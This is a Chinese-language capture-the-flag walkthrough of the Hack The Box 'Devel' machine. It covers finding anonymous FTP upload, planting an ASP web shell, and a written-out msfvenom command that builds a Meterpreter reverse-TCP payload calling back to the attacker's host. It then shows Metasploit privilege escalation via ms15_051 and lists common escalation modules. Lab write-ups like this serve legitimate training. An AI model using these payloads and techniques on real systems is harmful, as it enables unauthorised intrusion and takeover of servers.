HTB靶场系列之Devel通关攻略

admin 2022年10月5日15:52:48评论74 views字数 1192阅读3分58秒阅读模式

HTB靶场系列之Devel通关攻略

0x01 信息收集与探索

使用Nmap对靶机地址进行端口嗅探,发现开放80、21端口,操作系统为Windows。且21端口FTP服务存在匿名访问漏洞。

HTB靶场系列之Devel通关攻略

使用FTP客户端登录靶机FTP服务,查看FTP服务目录:

HTB靶场系列之Devel通关攻略

查看80端口的Web服务,仅有IIS 7的一个初始页面。

HTB靶场系列之Devel通关攻略

使用Dirsearch对Web服务进行目录扫描,发现存在aspnet_client页面,且该页面与FTP服务aspnet_client目录相同,为403状态禁止访问,可能是需要凭据的页面或者为目录。

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

未发现任何有价值进信息,还是得从FTP服务下手。发现FTP不仅存在匿名访问漏洞,还存在上传漏洞。

HTB靶场系列之Devel通关攻略

0x02 获取权限

在Kali找到asp的木马进行上传,上传成功。

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

查看权限,发现为最小的权限iis apppoolweb,无法获取flag,且无法做到交互式,比较麻烦。还是考虑MSF。

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

使用msfvenom生成asp木马,并上传至FTP服务。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx > shell.aspx

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

使用MSF进行监听4444端口,待访问http://10.129.104.58/shell.aspx时,shell回连。

HTB靶场系列之Devel通关攻略

访问http://10.129.104.58/shell.aspx,shell成功回连。

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

0x03 权限提升

尝试使用getsystem进行提权,未能提权成功。

HTB靶场系列之Devel通关攻略

使用multi/recon/local_exploit_suggester模块发现以下提权漏洞:

HTB靶场系列之Devel通关攻略

使用上图中可能存在漏洞的提权脚本进行提权,发现未能提权成功。

HTB靶场系列之Devel通关攻略

终于在exploit/windows/local/ms15_051_client_copy_image模块攻击成功,获取新的高权限shell。

HTB靶场系列之Devel通关攻略

在C:UsersAdministratorDesktop目录获得root.txt。

HTB靶场系列之Devel通关攻略

在C:UsersbabisDesktop目录获得user.txt。

HTB靶场系列之Devel通关攻略

HTB靶场系列之Devel通关攻略

0x04 攻击路径

HTB靶场系列之Devel通关攻略

0x05 知识点总结

5.1MSF常用的提权模块

post/multi/recon/local_exploit_suggester //获取可能存在的提权漏洞post/windows/gather/enum_patches //获取系统补丁exploit/windows/local/unquoted_service_path //利用可信任服务路径提权exploit/windows/local/service_permissions //利用系统服务权限配置错误提权exploit/windows/local/always_install_elevated //利用注册表键AlwaysInstallElevated提权

原文始发于微信公众号(Matrix1024):HTB靶场系列之Devel通关攻略

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日15:52:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB靶场系列之Devel通关攻略http://cn-sec.com/archives/1329925.html

发表评论

匿名网友 填写信息